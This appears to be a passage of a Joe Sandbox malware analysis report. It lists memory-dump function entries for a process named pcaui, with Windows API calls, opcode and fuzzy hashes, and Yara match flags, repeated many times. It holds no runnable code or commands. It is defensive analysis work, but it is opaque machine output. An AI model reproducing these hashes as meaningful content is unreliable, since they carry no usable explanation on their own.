                                                                                                                        • Instruction ID: a9f8462a27853ce9b93cd49de0a1c5d35021804858f96f1d154197efe8cd4aca
                                                                                                                        • Opcode Fuzzy Hash: b9f0f4d06115c67e49f51c5b5044230bcb79ddf0fdc6168a1d0332630c46ca4b
                                                                                                                        • Instruction Fuzzy Hash: 959002626415004351407158984440A70159BE23013D5C115A4554560C87188A55936E
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: f0cdba3048a7d0c9357717d3fcf2e98eacf16b29033847b3497304767be0aff0
                                                                                                                        • Instruction ID: a5e6588986b99ab8e0e811b6f41de69427b5af544946e6408be61ad62300b98e
                                                                                                                        • Opcode Fuzzy Hash: f0cdba3048a7d0c9357717d3fcf2e98eacf16b29033847b3497304767be0aff0
                                                                                                                        • Instruction Fuzzy Hash: 8490023264580013A140715898C454A50159BE1301BD5C011E4424554C8B148B565366
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fb396487db7915fde63357d0b62c771759a58e1d01d1b65bb3d69bbf82f0d225
                                                                                                                        • Instruction ID: 4377d4fe33df93bf601973c6785a0ee6491bef32a569cc442cea7bbf85a74470
                                                                                                                        • Opcode Fuzzy Hash: fb396487db7915fde63357d0b62c771759a58e1d01d1b65bb3d69bbf82f0d225
                                                                                                                        • Instruction Fuzzy Hash: C290022A25340003E1807158A44860E10158BD2202FD5D415A4015558CCA158A695326
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8c171b3081794da22b112e1dab20d7c2978df39e771187124d4194a9ba06b62f
                                                                                                                        • Instruction ID: ac5c842713f44c42f701d46b6b66303a9ba905090b5c75a1ae6fdc29f9e1bba2
                                                                                                                        • Opcode Fuzzy Hash: 8c171b3081794da22b112e1dab20d7c2978df39e771187124d4194a9ba06b62f
                                                                                                                        • Instruction Fuzzy Hash: C490022234140003E1407158A45860A5015DBE2301FD5D011E4414554CDA158A565327
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: f4775a4e9df6b719b2909d6762cfb8f2841d4aba82ecbd46709b7c27ba75edc3
                                                                                                                        • Instruction ID: ed16303aa8645dfa022f1ab70e9ad4f480baca8f11d30828e99f9a3b2e32ede7
                                                                                                                        • Opcode Fuzzy Hash: f4775a4e9df6b719b2909d6762cfb8f2841d4aba82ecbd46709b7c27ba75edc3
                                                                                                                        • Instruction Fuzzy Hash: 77900222282441536545B158944450B50169BE12417D5C012A5414950C86269A56D726
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8059939a337fc575519dd83b8a769396f8d29ba4386e43031f0321f40ebaec44
                                                                                                                        • Instruction ID: c0b16dd4fa2375a8c10df64e689fcb13689e6a357ab20fb750ae7a5fc1731957
                                                                                                                        • Opcode Fuzzy Hash: 8059939a337fc575519dd83b8a769396f8d29ba4386e43031f0321f40ebaec44
                                                                                                                        • Instruction Fuzzy Hash: C190023224140413E1117158954470B10198BD1241FD5C412A4424558D97568B52A226
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 2140d860a56c6806967843a061f7323411ba2d0719c76343bcf1a36c73329311
                                                                                                                        • Instruction ID: 74240fcb84b195c7c9300a33b89133d0207258d8272813a42083449b99a5cb40
                                                                                                                        • Opcode Fuzzy Hash: 2140d860a56c6806967843a061f7323411ba2d0719c76343bcf1a36c73329311
                                                                                                                        • Instruction Fuzzy Hash: C190023224140843E10071589444B4A10158BE1301FD5C016A4124654D8715CA517626
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d8f13ecdf74593c7366d2de3986f4b9aabfd5feb624f4436702682e8b21487aa
                                                                                                                        • Instruction ID: a2d8b8d659acb2a8778ad5656eb9522c5b3871c5b5627f933c0878049bf8eaa9
                                                                                                                        • Opcode Fuzzy Hash: d8f13ecdf74593c7366d2de3986f4b9aabfd5feb624f4436702682e8b21487aa
                                                                                                                        • Instruction Fuzzy Hash: 3F90023224148803E1107158D44474E10158BD1301FD9C411A8424658D87958A917226
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 9ed1022b60a2bc7c60bc0de11759ce011507777fe90729052c5ddfd15dc3ddac
                                                                                                                        • Instruction ID: 679b4fa1a5aa81c5e9d4a81577672846f68d563cbe1ded18008f01cda5679df1
                                                                                                                        • Opcode Fuzzy Hash: 9ed1022b60a2bc7c60bc0de11759ce011507777fe90729052c5ddfd15dc3ddac
                                                                                                                        • Instruction Fuzzy Hash: C690023224140403E1007598A44864A10158BE1301FD5D011A9024555EC7658A916236
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8cd8e60e30d7514be6d16abb083d0cb88e9cd589c71863ef0da0875d3c8d9490
                                                                                                                        • Instruction ID: fe4ac933edf326b3a849109c5042c5e6dd1216376a0968227272f39de8c07fdd
                                                                                                                        • Opcode Fuzzy Hash: 8cd8e60e30d7514be6d16abb083d0cb88e9cd589c71863ef0da0875d3c8d9490
                                                                                                                        • Instruction Fuzzy Hash: 4690026238140443E10071589454B0A1015CBE2301FD5C015E5064554D8719CE52622B
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d422732ad57cf876448d7f08c9bca34447ac08ec2444a7986a7722c80187b8b1
                                                                                                                        • Instruction ID: 18e0016671900c5056471e12b2357609b67b42432341eafbc3e85d468b0f60a1
                                                                                                                        • Opcode Fuzzy Hash: d422732ad57cf876448d7f08c9bca34447ac08ec2444a7986a7722c80187b8b1
                                                                                                                        • Instruction Fuzzy Hash: 5490022228545103E150715C944461A5015ABE1201FD5C021A4814594D86558A556326
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        • Opcode ID: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                                                        • Instruction ID: 0fc8d00b0037ccf50f678bf2abfcedfea7c000fd343e92442eb99f2ef5ff70c7
                                                                                                                        • Opcode Fuzzy Hash: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                                                        • Instruction Fuzzy Hash: AB311EB5A0020AAFDB10DFD8D8809EEB7B9FF88304B108559E515EB314D775AE05CBA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeUninitialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                                        • Opcode ID: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                                                        • Instruction ID: 91c3e89ab1a5ba1a8dcff09dbceff7ecfd4d41195ae462ec8dfd2a839bb51f14
                                                                                                                        • Opcode Fuzzy Hash: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                                                        • Instruction Fuzzy Hash: 45312DB6A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E515EB314D775AE05CBA0
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02D83E3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: wininet.dll
                                                                                                                        • API String ID: 3472027048-3354682871
                                                                                                                        • Opcode ID: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                                                        • Instruction ID: 471098ad4c3c6fcc5932a421023346ee0a78f3ba2e5dd0c8329cdd0425d2a3f6
                                                                                                                        • Opcode Fuzzy Hash: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                                                        • Instruction Fuzzy Hash: 12316EB1605705ABD714EFA4CC80FEBB7B9EB88B14F00455DE65DAB380D370AA41CBA5
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D74932
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                                                        • Instruction ID: a78f9432dd770fc24566d3837f6af15761b0e3c405305e81e479d1466638a0e6
                                                                                                                        • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                                                        • Instruction Fuzzy Hash: F3011EB9D0020EABDF14EBE4EC41FAEB779AB44308F004195A91897241F635EB58CBA1
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02D7868E,00000010,?,?,?,00000044,?,00000010,02D7868E,?,?,?), ref: 02D89C53
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        • Opcode ID: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                                                        • Instruction ID: bc6d4cee70d29281e06361b52f93c351dc0e1a4fbbcce1e1070782f2ce7e2bcc
                                                                                                                        • Opcode Fuzzy Hash: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                                                        • Instruction Fuzzy Hash: 2B0180B2214509BBCB54DE99DC80EEB77ADEF8C754F508108BA0DE3250D630FC518BA4
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D69DF5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                                                        • Instruction ID: 327727fd4c334870252faf656dfd7b142b00aaca9ec5ec19d3398405fb284fcc
                                                                                                                        • Opcode Fuzzy Hash: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                                                        • Instruction Fuzzy Hash: 56F0397339120436E22075E99C02FE7B28DCB82BA1F140066F60DEA6C0D9A2B90186B5
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D69DF5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                                                        • Instruction ID: d4cbd4ce0bfc6e027d6962a236e25e6c805d5d062bf60d5c4e03a55f6c3b7608
                                                                                                                        • Opcode Fuzzy Hash: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                                                        • Instruction Fuzzy Hash: BCF06D733513007BE23076A98C46FDB775DCF82B61F140156F60AEB6C1DAA2B9428BB5
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,02D74138,000000F4), ref: 02D89B9F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction ID: c9701e4ce4e03af69dbb620c7d1d389f6d5eb413e26d91b2126eca7d2e8bcf7a
                                                                                                                        • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                                                        • Instruction Fuzzy Hash: 96E032B6210208BBD614EA99DC44FEB73ADEBC9710F004019B908A7241D630B8108AB8
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(02D71D99,?,02D86223,02D71D99,02D8596F,02D86223,?,02D71D99,02D8596F,00001000,?,?,00000000), ref: 02D89B4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction ID: ab3996ff457b3f041c58b972385279a95c83954e5dee7e4cfcb78962380d8c0a
                                                                                                                        • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                                                        • Instruction Fuzzy Hash: 77E065B2200208BBD610EF98EC84FAB77ADEFC8710F00440AF908A7380D670BD118BB4
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02D786FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                                                        • Instruction ID: 06ccf842434c05e39c59b8bd33c9b9aa1ff0c190aadc3742f5a48d9cf8220da0
                                                                                                                        • Opcode Fuzzy Hash: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                                                        • Instruction Fuzzy Hash: 1DE0487625030817E72465A89C45F6533589B48628F584551F91EDB7C1E678F9019550
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D74932
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction ID: 1d54ba5b58068217cda63eb8473018ec511d7dcd906de0914acd8efb780dbe9e
                                                                                                                        • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                                                        • Instruction Fuzzy Hash: D3E01235A5414AAECF54CB94CC81F99B778EB45518F0483CAD928972D1E634EA068781
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(?,00000111), ref: 02D71197
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1836367815-0
                                                                                                                        • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                        • Instruction ID: 3ccf0fc053d19b33f3ac9d0f47266fd5e434f45272eac182bd6bb7f07028f863
                                                                                                                        • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                        • Instruction Fuzzy Hash: 9FD0A967B4000C3AAA024584ACC1DFEBB2CEB84AA6F004063FF08E6140E6218D060AB0
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02D720A0,02D882AE,02D8596F,02D72066), ref: 02D784F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_2d60000_pcaui.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                                                        • Instruction ID: 574a41ba1450ba4bee492819e2bb651237dc48e45f5673a8541c4d42bdb2c2f4
                                                                                                                        • Opcode Fuzzy Hash: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                                                        • Instruction Fuzzy Hash: 91D05E723903043BE600E6E4CC06F26328DDB05798F098069B90DF7BC1EA65FA414A76
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1d31687615767bd267cab2633e2fbfe4fd9531861c8aa18a8569956914ff327c
                                                                                                                        • Instruction ID: 5229b256f124d7f2058ff031df82875209810361cedeb5bc051fb919e5a90ff1
                                                                                                                        • Opcode Fuzzy Hash: 1d31687615767bd267cab2633e2fbfe4fd9531861c8aa18a8569956914ff327c
